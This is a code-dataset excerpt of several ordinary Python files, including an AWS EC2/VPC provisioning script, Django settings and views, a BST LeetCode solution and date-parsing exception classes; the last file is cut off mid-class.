blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d3ec5b088a135db2f9b6e929ee4d35e3c6dee45b
|
4f510470b3093ab2c60f929221af82c79b121ca7
|
/python_net/day6/clock.py
|
c2d5b6098c3805e3c03231421859c85e08e5ae48
|
[] |
no_license
|
q737645224/python3
|
ce98926c701214f0fc7da964af45ba0baf8edacf
|
4bfabe3f4bf5ba4133a16102c51bf079d500e4eb
|
refs/heads/master
| 2020-03-30T07:11:17.202996 | 2018-10-30T06:14:51 | 2018-10-30T06:14:51 | 150,921,088 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 409 |
py
|
from multiprocessing import Process
import time
class ClockProcess(Process):
def __init__(self,value):
#调用父类init
super().__init__()
self.value = value
#重写run方法
def run(self):
for i in range(5):
time.sleep(self.value)
print("The time is {}".format(time.ctime()))
p = ClockProcess(2)
#自动执行run
p.start()
p.join()
|
[
"[email protected]"
] | |
1d2507a1c919eb50f1f0b17dac4098ce8f506800
|
bab18992fe3265a2eacfb08f1c6241188f7ac225
|
/python_scripts/aws_setup.py
|
5e1d0d48d09784027693118b457be8c81b5dca82
|
[
"Apache-2.0"
] |
permissive
|
sjdlloyd/imagenet-fast
|
5978597f43d29cab0a430aa1128eadd1abc3e4f9
|
edfa49711c9d0076f40352badf4179c4e53f347a
|
refs/heads/master
| 2020-03-07T07:39:47.641129 | 2018-03-29T23:08:13 | 2018-03-29T23:08:13 | 127,355,266 | 0 | 0 |
Apache-2.0
| 2018-03-29T22:50:04 | 2018-03-29T22:50:04 | null |
UTF-8
|
Python
| false | false | 10,202 |
py
|
import argparse
import boto3
import paramiko
import os, sys, time
from pathlib import Path
session = boto3.Session()
ec2 = session.resource('ec2')
ec2c = session.client('ec2')
def get_vpc(name):
vpcs = list(ec2.vpcs.filter(Filters=[{'Name': 'tag-value', 'Values': [name]}]))
return vpcs[0] if vpcs else None
def get_instance(name):
instances = list(ec2.instances.filter(Filters=[{'Name': 'tag-value', 'Values': [name]}]))
return instances[0] if instances else None
def get_vpc_info(vpc):
try:
vpc_tag_name = list(filter(lambda i: i['Key'] == 'Name', vpc.tags))[0]['Value']
sg = list(vpc.security_groups.filter(Filters=[{'Name': 'group-name', 'Values': [f'{vpc_tag_name}-security-group']}]))[0]
subnet = list(vpc.subnets.filter(Filters=[{'Name': 'tag-value', 'Values': [f'{vpc_tag_name}-subnet']}]))[0]
except Exception as e:
print('Could not get VPC info: ', e)
return sg.id, subnet.id
def get_vpc_ids(name):
vpc = get_vpc(name)
if vpc is None: return None
sg_id, subnet_id = get_vpc_info(vpc)
return vpc.id, sg_id, subnet_id
def create_ec2_keypair(name):
ssh_dir = Path.home()/'.ssh'
ssh_dir.mkdir(exist_ok=True)
keypair_name = f'aws-key-{name}'
filename = ssh_dir/f'{keypair_name}.pem'
if filename.exists():
print('Keypair exists')
return
keypair = ec2.create_key_pair(KeyName=keypair_name)
keypair_out = keypair.key_material
outfile = open(filename,'w')
outfile.write(keypair_out)
os.chmod(filename, 0o400)
print('Created keypair')
def get_ssh_command(instance):
return f'ssh -i ~/.ssh/{instance.key_name}.pem ubuntu@{instance.public_ip_address}'
def create_vpc(name):
cidr_block='10.0.0.0/28'
vpc = ec2.create_vpc(CidrBlock=cidr_block)
vpc.modify_attribute(EnableDnsSupport={'Value':True})
vpc.modify_attribute(EnableDnsHostnames={'Value':True})
vpc.create_tags(Tags=[{'Key':'Name','Value':name}])
ig = ec2.create_internet_gateway()
ig.attach_to_vpc(VpcId=vpc.id)
ig.create_tags(Tags=[{'Key':'Name','Value':f'{name}-gateway'}])
subnet = vpc.create_subnet(CidrBlock=cidr_block)
subnet.create_tags(Tags=[{'Key':'Name','Value':f'{name}-subnet'}])
# TODO: enable public ip?
# subnet.meta.client.modify_subnet_attribute(SubnetId=subnet.id, MapPublicIpOnLaunch={"Value": True})
rt = vpc.create_route_table()
rt.create_tags(Tags=[{'Key':'Name','Value':f'{name}-route-table'}])
rt.associate_with_subnet(SubnetId=subnet.id)
rt.create_route(DestinationCidrBlock='0.0.0.0/0', GatewayId=ig.id)
cidr = '0.0.0.0/0'
sg = vpc.create_security_group(GroupName=f'{name}-security-group', Description='SG for {name} machine')
# ssh
sg.authorize_ingress(IpProtocol='tcp', FromPort=22, ToPort=22, CidrIp=cidr)
# jupyter notebook
sg.authorize_ingress(IpProtocol='tcp', FromPort=8888, ToPort=8898, CidrIp=cidr)
# allow efs
IpPermissions=[{
'FromPort': 2049,
'ToPort': 2049,
'IpProtocol': 'tcp',
'UserIdGroupPairs': [{ 'GroupId': sg.id }],
}]
sg.authorize_ingress(IpPermissions=IpPermissions)
return vpc
def get_ami(region=None):
if region is None: region = session.region_name
region2ami = {
'us-west-2': 'ami-8c4288f4',
'eu-west-1': 'ami-b93c9ec0',
'us-east-1': 'ami-c6ac1cbc'
}
return region2ami[region]
def allocate_vpc_addr(instance_id):
alloc_addr = ec2c.allocate_address(Domain='vpc')
ec2c.associate_address(InstanceId=instance_id, AllocationId=alloc_addr['AllocationId'])
return alloc_addr
def create_instance(name, launch_specs):
instance = ec2.create_instances(ImageId=launch_specs['ImageId'], InstanceType=launch_specs['InstanceType'],
MinCount=1, MaxCount=1,
KeyName=launch_specs['KeyName'],
BlockDeviceMappings=launch_specs['BlockDeviceMappings'],
NetworkInterfaces=launch_specs['NetworkInterfaces']
)[0]
instance.create_tags(Tags=[{'Key':'Name','Value':f'{name}'}])
print('Instance created...')
instance.wait_until_running()
print('Creating public IP address...')
addr_id = allocate_vpc_addr(instance.id)['AllocationId']
print('Rebooting...')
instance.reboot()
instance.wait_until_running()
print(f'Completed. SSH: ', get_ssh_command(instance))
return instance
def wait_on_fullfillment(req_status):
while req_status['State'] != 'active':
print('Waiting on spot fullfillment...')
time.sleep(5)
req_statuses = ec2c.describe_spot_instance_requests(Filters=[{'Name': 'spot-instance-request-id', 'Values': [req_status['SpotInstanceRequestId']]}])
req_status = req_statuses['SpotInstanceRequests'][0]
if req_status['State'] == 'failed' or req_status['State'] == 'closed':
print('Spot instance request failed:', req_status['Status'])
return None
instance_id = req_status['InstanceId']
print('Fullfillment completed. InstanceId:', instance_id)
return instance_id
def get_spot_prices():
hist = ec2c.describe_spot_price_history()['SpotPriceHistory']
return {h['InstanceType']:h['SpotPrice'] for h in hist}
class LaunchSpecs:
def __init__(self, vpc, instance_type='t2.micro'):
self.ami = get_ami()
self.sg_id, self.subnet_id = get_vpc_info(vpc)
self.instance_type = instance_type
self.device = '/dev/sda1'
self.volume_size = 100
self.volume_type = 'gp2'
self.vpc_tagname = list(filter(lambda i: i['Key'] == 'Name', vpc.tags))[0]['Value']
self.keypair_name = f'aws-key-{self.vpc_tagname}'
def build(self):
launch_specification = {
'ImageId': self.ami,
'InstanceType': self.instance_type,
'KeyName': self.keypair_name,
'NetworkInterfaces': [{
'DeviceIndex': 0,
'SubnetId': self.subnet_id,
'Groups': [self.sg_id],
'AssociatePublicIpAddress': True
}],
'BlockDeviceMappings': [{
'DeviceName': '/dev/sda1',
'Ebs': {
# Volume size must be greater than snapshot size of 80
'VolumeSize': self.volume_size,
'DeleteOnTermination': True,
'VolumeType': self.volume_type
}
}]
}
return launch_specification
def create_spot_instance(name, launch_specs, spot_price='0.5'):
spot_requests = ec2c.request_spot_instances(SpotPrice=spot_price, LaunchSpecification=launch_specs)
spot_request = spot_requests['SpotInstanceRequests'][0]
instance_id = wait_on_fullfillment(spot_request)
print('Rebooting...')
instance = list(ec2.instances.filter(Filters=[{'Name': 'instance-id', 'Values': [instance_id]}]))[0]
instance.reboot()
instance.wait_until_running()
instance.create_tags(Tags=[{'Key':'Name','Value':f'{name}'}])
print(f'Completed. SSH: ', get_ssh_command(instance))
return instance
def create_efs(name, vpc):
sg_id, subnet_id = get_vpc_info(vpc)
efsc = session.client('efs')
efs_response = efsc.create_file_system(CreationToken=f'{name}', PerformanceMode='generalPurpose')
efs_id = efs_response['FileSystemId']
efsc.create_tags(FileSystemId=efs_id, Tags=[{'Key': 'Name', 'Value': f'{name}'}])
mount_target = efsc.create_mount_target(FileSystemId=efs_id,
SubnetId=subnet_id,
SecurityGroups=[sg_id])
return efs_response
def get_efs_address(name):
efsc = session.client('efs')
file_systems = efsc.describe_file_systems()['FileSystems']
target = list(filter(lambda x: x['Name'] == name, file_systems))
if target:
fs_id = target[0]['FileSystemId']
region = session.region_name
return f'{fs_id}.efs.{region}.amazonaws.com'
def attach_volume(instance, volume_tag, device='/dev/xvdf'):
volumes = list(ec2.volumes.filter(Filters=[{'Name': 'tag-value', 'Values': [volume_tag]}]))
if not volumes: print('Could not find volume for tag:', volume_tag); return
instance.attach_volume(Device=device, VolumeId=volumes[0].id)
instance.reboot()
instance.wait_until_running()
print('Volume attached. Please make sure to ssh into instance to format (if new volume) and mount')
# TODO: need to make sure ebs is formatted correctly inside the instance
return instance
def create_volume(name, size=120, volume_type='gp2'):
tag_specs = [{
'Tags': [{
'Key': 'Name',
'Value': f'{name}'
}]
}]
volume = ec2.create_volume(Size=size, VolumeType=volume_type, TagSpecifications=tag_specs)
return volume
def connect_to_instance(instance, keypath=f'{Path.home()}/.ssh/aws-key-fast-ai.pem', username='ubuntu', timeout=10):
print('Connecting to SSH...')
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 20
while retries > 0:
try:
client.connect(instance.public_ip_address, username=username, key_filename=keypath, timeout=timeout)
print('Connected!')
break
except Exception as e:
print(f'Exception: {e} Retrying...')
retries = retries - 1
time.sleep(10)
return client
def run_command(client, cmd, inputs=[]):
stdin, stdout, stderr = client.exec_command(cmd, get_pty=True)
for inp in inputs:
# example = 'mypassword\n'
stdin.write(inp)
stdout_str = stdout.read().decode('utf8')
stderr_str = stderr.read().decode('utf8')
print("run_command returned: \n" + stdout_str)
return stdout_str, stderr_str
def upload_file(client, localpath, remotepath):
# file = f'{Path.home()}/Projects/ML/fastai/fastai_imagenet/testfile.txt'
ftp_client=client.open_sftp()
ftp_client.put(localpath, remotepath)
ftp_client.close()
|
[
"[email protected]"
] | |
8ab39253c3c68371ad76627741d0833f97e1c4b5
|
3929d114c1bc6aef86402300a8d5b278849d41ae
|
/701. Insert into a Binary Search Tree.py
|
5abb58bce2b3ff9cf773ac80caf45a589b4e5a5e
|
[] |
no_license
|
lxyshuai/leetcode
|
ee622235266017cf18da9b484f87c1cf9ceb91d0
|
5f98270fbcd2d28d0f2abd344c3348255a12882a
|
refs/heads/master
| 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
"""
Given the root node of a binary search tree (BST) and a value to be inserted into the tree, insert the value into the BST. Return the root node of the BST after the insertion. It is guaranteed that the new value does not exist in the original BST.
Note that there may exist multiple valid ways for the insertion, as long as the tree remains a BST after insertion. You can return any of them.
For example,
Given the tree:
4
/ \
2 7
/ \
1 3
And the value to insert: 5
You can return this binary search tree:
4
/ \
2 7
/ \ /
1 3 5
This tree is also valid:
5
/ \
2 7
/ \
1 3
\
4
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def insertIntoBST(self, root, val):
"""
:type root: TreeNode
:type val: int
:rtype: TreeNode
"""
def process(root, val):
if root.val > val:
if root.left:
process(root.left, val)
else:
root.left = TreeNode(val)
elif root.val < val:
if root.right:
process(root.right, val)
else:
root.right = TreeNode(val)
return root
if root is None:
return TreeNode(val)
return process(root, val)
|
[
"[email protected]"
] | |
dc309c761d457be4dcea5b7d6967cc27013e4e07
|
209a7a4023a9a79693ec1f6e8045646496d1ea71
|
/COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/aniso8601/exceptions.py
|
887cfbd010261406a1330c553a6636ff210ef2f6
|
[
"MIT"
] |
permissive
|
anzhao920/MicrosoftProject15_Invictus
|
5e2347015411bbffbdf0ceb059df854661fb240c
|
15f44eebb09561acbbe7b6730dfadf141e4c166d
|
refs/heads/main
| 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 |
MIT
| 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null |
UTF-8
|
Python
| false | false | 1,182 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Brandon Nielsen
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
class ISOFormatError(ValueError):
"""Raised when ISO 8601 string fails a format check."""
class NegativeDurationError(ValueError):
"""Raised when a duration is negative."""
class YearOutOfBoundsError(ValueError):
"""Raised when year exceeds limits."""
class WeekOutOfBoundsError(ValueError):
"""Raised when week exceeds a year."""
class DayOutOfBoundsError(ValueError):
"""Raised when day is outside of 1..365, 1..366 for leap year."""
class HoursOutOfBoundsError(ValueError):
"""Raise when parsed hours are greater than 24."""
class MinutesOutOfBoundsError(ValueError):
"""Raise when parsed seconds are greater than 60."""
class SecondsOutOfBoundsError(ValueError):
"""Raise when parsed seconds are greater than 60."""
class MidnightBoundsError(ValueError):
"""Raise when parsed time has an hour of 24 but is not midnight."""
class LeapSecondError(NotImplementedError):
"""Raised when attempting to parse a leap second"""
|
[
"[email protected]"
] | |
c2e612ddf1c155b9790bbcbab3b932deecd1ebe2
|
dddbf58aa36d9779f1e50e2d761e93fb7580b835
|
/settings.py
|
9d107f569ede8b4149aab50b91ae1c74772489af
|
[] |
no_license
|
powellc/lobby_slideshow
|
7566933707554b1f4188bd116fcdf51668442d0d
|
b1fc222c14dd4a9bda5665a7ade6dbe1a20b7d1d
|
refs/heads/master
| 2021-01-02T22:19:23.065149 | 2014-03-07T19:51:33 | 2014-03-07T19:51:33 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,516 |
py
|
# Django settings for lobby_adamsschool_com project.
import os
import sys
gettext = lambda s: s
PROJECT_PATH = os.path.abspath(os.path.dirname(__file__))
PUBLIC_DIR = os.path.join(PROJECT_PATH, 'public')
LOBBY_HOME = os.path.join(PUBLIC_DIR, 'lobby')
sys.path.insert(0, os.path.join(PROJECT_PATH, "apps"))
ADMINS = (
('Colin Powell', '[email protected]'),
)
MANAGERS = ADMINS
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
gettext_noop = lambda s: s
LANGUAGES = [
('en', gettext_noop('English')),
]
MEDIA_ROOT = os.path.join(LOBBY_HOME, 'media')
STATIC_ROOT = os.path.join(PUBLIC_DIR, 'static')
MEDIA_URL = "/media/"
STATIC_URL = '/static/'
ADMIN_MEDIA_PREFIX = os.path.join(PUBLIC_DIR, "static/admin")
THUMBNAIL_BASEDIR = 'cache'
from imp import find_module
STATICFILES_DIRS = (
os.path.join(os.path.abspath(find_module("debug_toolbar")[1]), 'media'),
os.path.join(os.path.abspath(find_module("superslides")[1]), 'media'),
os.path.join(PROJECT_PATH, 'static'),
)
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'lobby_slideshow.wsgi.application'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
DEBUG_TOOLBAR_MEDIA_ROOT = os.path.join(STATIC_ROOT, 'debug_toolbar')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '=uwxb__g7_w1f7kqznn4fddmgo-y(6)x@fn2lxq(lptb0pqj09'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
os.path.join(PROJECT_PATH, "templates")
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
'south',
'django_extensions',
'debug_toolbar',
'superslides',
'easy_thumbnails',
)
SUPERSLIDES_ROOT = 'slides'
SUPERSLIDES_SLIDE_SIZE = '1300x800'
THUMBNAIL_ALIASES = {
'': {
'slideshow': {'size': (1300, 800), 'crop': False},
},
}
TINYMCE_DEFAULT_CONFIG = {
'plugins': "table,spellchecker,paste,searchreplace",
'theme': "advanced",
}
TINYMCE_SPELLCHECKER = True
TINYMCE_COMPRESSOR = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
from local_settings import *
|
[
"[email protected]"
] | |
efacaba6ff291bba29e7c9f3869a4f4493c615f2
|
65b265426676b9e5ea72e6787ad82fab3446920a
|
/main.py
|
28c53eef4aa2d4e2ec7677b58da224206510035d
|
[] |
no_license
|
podder-ai/podder-task-sample-tessaract
|
47c3687a1d9483f29d9f1b913ddddb2ccfcc2606
|
ef8dfa723e0d3dba81363982ab9152c5bfea46e0
|
refs/heads/master
| 2022-12-02T13:24:05.814188 | 2019-11-17T04:46:33 | 2019-11-17T04:46:33 | 222,094,410 | 0 | 0 | null | 2022-11-22T04:50:00 | 2019-11-16T12:14:30 |
Python
|
UTF-8
|
Python
| false | false | 259 |
py
|
import uuid
from app.task import Task
from podder_task_foundation import MODE
DAG_ID = "___dag_id___"
def main() -> None:
task = Task(MODE.CONSOLE)
job_id = str(uuid.uuid1())
task.handle(job_id, DAG_ID)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
ed6d9c2ba7ef83ea5ce9da0efe39162f598deded
|
1548ce77537dcd50ab04b0eaee050b5d30553e23
|
/autotabular/constants.py
|
c0ad9e5d846e8aca277e0a36426e69307ed79833
|
[
"Apache-2.0"
] |
permissive
|
Shamoo100/AutoTabular
|
4a20e349104246bf825ebceae33dca0a79928f2e
|
7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2
|
refs/heads/main
| 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 920 |
py
|
BINARY_CLASSIFICATION = 1
MULTICLASS_CLASSIFICATION = 2
MULTILABEL_CLASSIFICATION = 3
REGRESSION = 4
MULTIOUTPUT_REGRESSION = 5
REGRESSION_TASKS = [REGRESSION, MULTIOUTPUT_REGRESSION]
CLASSIFICATION_TASKS = [
BINARY_CLASSIFICATION, MULTICLASS_CLASSIFICATION, MULTILABEL_CLASSIFICATION
]
TASK_TYPES = REGRESSION_TASKS + CLASSIFICATION_TASKS
TASK_TYPES_TO_STRING = \
{BINARY_CLASSIFICATION: 'binary.classification',
MULTICLASS_CLASSIFICATION: 'multiclass.classification',
MULTILABEL_CLASSIFICATION: 'multilabel.classification',
REGRESSION: 'regression',
MULTIOUTPUT_REGRESSION: 'multioutput.regression'}
STRING_TO_TASK_TYPES = \
{'binary.classification': BINARY_CLASSIFICATION,
'multiclass.classification': MULTICLASS_CLASSIFICATION,
'multilabel.classification': MULTILABEL_CLASSIFICATION,
'regression': REGRESSION,
'multioutput.regression': MULTIOUTPUT_REGRESSION}
|
[
"[email protected]"
] | |
438d6c4940c8513fdd919f483d63f2bfc6b96bc8
|
b767d5e8c5a32d360196ff3b89efc42dce0071b3
|
/blog/acl/views.py
|
deae34df69b4570befe5e51dbec27d7a352187c5
|
[] |
no_license
|
wangjiancn/back-end_blog
|
749d40a1c447975408a5538c33ac334d826d5d2c
|
da79506169573df7d48784f5f109be61e59edc7b
|
refs/heads/master
| 2022-12-11T06:34:17.641252 | 2020-04-13T13:13:35 | 2020-04-13T14:24:26 | 186,651,614 | 1 | 0 | null | 2022-05-25T02:48:28 | 2019-05-14T15:35:24 |
Python
|
UTF-8
|
Python
| false | false | 813 |
py
|
import json
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth import authenticate
from .models import UserProfile
from .auth_wrap import token_required
from utils.api_response import APIResponse, APIResponseError
@require_POST
@csrf_exempt
def register(r):
"""注册"""
data = json.loads(r.body)
user = UserProfile.objects.create_user(**data)
return APIResponse(user.token)
@csrf_exempt
@require_POST
def login(r):
"""登录"""
data = json.loads(r.body)
user = authenticate(**data)
if user is not None:
return APIResponse(user.token)
else:
return APIResponseError(10005)
@token_required
@require_POST
@csrf_exempt
def logout(r):
"""注销"""
return APIResponse()
|
[
"[email protected]"
] | |
68fff833f3fd4310916ca1b8d9065f46d4002a05
|
9cc1b58d0319308da98187d071295b2fabf1f080
|
/TQC_考題練習/b0526_TQC證照_301.py
|
37df2111df4e754b9ad91e97a2c89db29fd43817
|
[
"MIT"
] |
permissive
|
Arwen0905/Python_Test
|
60d1dee383c9cf27df6b93cfde7884c91092229c
|
c75357e4354a684a9fae41f751dae60d4cf0716c
|
refs/heads/master
| 2023-01-13T13:14:55.355898 | 2020-10-31T18:52:07 | 2020-10-31T18:52:07 | 265,150,874 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 798 |
py
|
# 1. 題目說明:
# 請開啟PYD301.py檔案,依下列題意進行作答,
# 依輸入值計算總和,使輸出值符合題意要求。
# 作答完成請另存新檔為PYA301.py再進行評分。
# 2. 設計說明:
# 請使用迴圈敘述撰寫一程式,
# 讓使用者輸入兩個正整數a、b(a < b),
# 利用迴圈計算從a開始連加到b的總和。
# 例如:輸入a=1、b=100,
# 則輸出結果為5050(1 + 2 + … + 100 = 5050)。
# 3. 輸入輸出:
# 輸入說明
# 兩個正整數(a、b,且a < b)
# 輸出說明
# 計算從a開始連加到b的總和
# 輸入輸出範例
# 範例輸入
# 66
# 666
# 範例輸出
# 219966
# TODO
a = int(input())
b = int(input())
# a,b = 66,666
ans = 0
if a<b:
for i in range(a, b+1):
ans+=i
print(ans)
|
[
"[email protected]"
] | |
831feaf2beaa8177145bc39ad2ed5b7309728577
|
e61e8f906b7f1de60fca47ac01293ef695d22a9b
|
/home/migrations/0003_auto_20181127_2103.py
|
c688484ad34957611673fae6c50c61d7c7a3a693
|
[] |
no_license
|
redcliver/marioseguros
|
e5f775d129a201e80a55f7ac266952e41ecb9079
|
da0aeb3b2625dd0ce35e074d94231066a9483501
|
refs/heads/master
| 2020-03-30T02:40:21.419727 | 2019-02-04T14:19:36 | 2019-02-04T14:19:36 | 150,642,755 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,504 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-11-27 21:03
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home', '0002_auto_20181127_0958'),
]
operations = [
migrations.AddField(
model_name='cliente',
name='inscricao',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='bairro',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cep',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cidade',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='cpf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='data_nasc',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
migrations.AlterField(
model_name='cliente',
name='endereco',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AlterField(
model_name='cliente',
name='estado',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='cliente',
name='numero',
field=models.CharField(blank=True, max_length=6, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='rg_uf',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='cliente',
name='venc_habilitacao',
field=models.DateTimeField(blank=True, default=django.utils.timezone.now, null=True),
),
]
|
[
"[email protected]"
] | |
5e0ef252f9b0c83b10c62836004ad7774ad55827
|
377420d718094a37da2e170718cecd80435d425a
|
/google/ads/googleads/v4/services/types/user_interest_service.py
|
e0da2b7489e7318a888329e4829469e8b0cd7f31
|
[
"Apache-2.0"
] |
permissive
|
sammillendo/google-ads-python
|
ed34e737748e91a0fc5716d21f8dec0a4ae088c1
|
a39748521847e85138fca593f3be2681352ad024
|
refs/heads/master
| 2023-04-13T18:44:09.839378 | 2021-04-22T14:33:09 | 2021-04-22T14:33:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,219 |
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v4.services",
marshal="google.ads.googleads.v4",
manifest={"GetUserInterestRequest",},
)
class GetUserInterestRequest(proto.Message):
r"""Request message for
[UserInterestService.GetUserInterest][google.ads.googleads.v4.services.UserInterestService.GetUserInterest].
Attributes:
resource_name (str):
Required. Resource name of the UserInterest
to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"[email protected]"
] | |
429b151fd242a071d82942054526cb5f29dacb65
|
e7a48c161eabd4b941f4cc29a8064c5ba2ec1aa3
|
/project/apps/tables/views.py
|
7c1987ac8cb055cb7b9fd7144915232a31822d6e
|
[] |
no_license
|
MauricioDinki/mesa-regalos
|
7d3d7968990323a828dd58107045d12db1f005a3
|
66dbb879421a2f563b731154462e526036f9d957
|
refs/heads/master
| 2022-12-12T06:04:36.508639 | 2019-05-30T07:23:21 | 2019-05-30T07:23:21 | 189,360,356 | 0 | 0 | null | 2022-12-08T05:11:50 | 2019-05-30T06:41:55 |
Python
|
UTF-8
|
Python
| false | false | 3,218 |
py
|
from django.contrib import messages
from django.http import Http404
from django.shortcuts import redirect
from django.template.response import TemplateResponse
from django.urls import reverse, reverse_lazy
from django.views import View
from django.views.generic import FormView, DeleteView, UpdateView, TemplateView
from project.apps.gifts.models import Gift
from project.apps.tables.forms import EventForm, BuyGiftForm
from project.apps.tables.models import Table, TableGift
from project.core.mixins import RequestFormMixin
class EventView(RequestFormMixin, FormView):
template_name = 'events/create.html'
form_class = EventForm
success_url = reverse_lazy('gifts:gifts')
def form_valid(self, form):
form.save()
return super(EventView, self).form_valid(form)
class TableDeleteView(DeleteView):
model = Table
template_name = 'tables/delete.html'
success_url = reverse_lazy('users:profile')
def get_object(self, queryset=None):
""" Hook to ensure object is owned by request.user. """
obj = super(TableDeleteView, self).get_object()
if not obj.user == self.request.user:
raise Http404
return obj
class TableUpdate(RequestFormMixin, UpdateView):
template_name = 'tables/update.html'
form_class = EventForm
success_url = reverse_lazy('users:profile')
pk_url_kwarg = 'pk'
def get_object(self, queryset=None):
pk = self.kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
return obj
class TableDetailView(TemplateView):
template_name = 'tables/detail.html'
def get_context_data(self, **kwargs):
context = super(TableDetailView, self).get_context_data(**kwargs)
pk = kwargs.get('pk')
obj = Table.objects.get(pk=pk)
if not obj.user == self.request.user:
raise Http404
gifts = TableGift.objects.filter(table=obj)
context['table'] = obj
context['gifts'] = gifts
return context
class SelectGiftView(View):
def get_context_data(self, **kwargs):
pk = kwargs.get('pk')
table = Table.objects.get(pk=pk)
gifts = TableGift.objects.filter(table=table)
context = {
'table': table,
'gifts': gifts
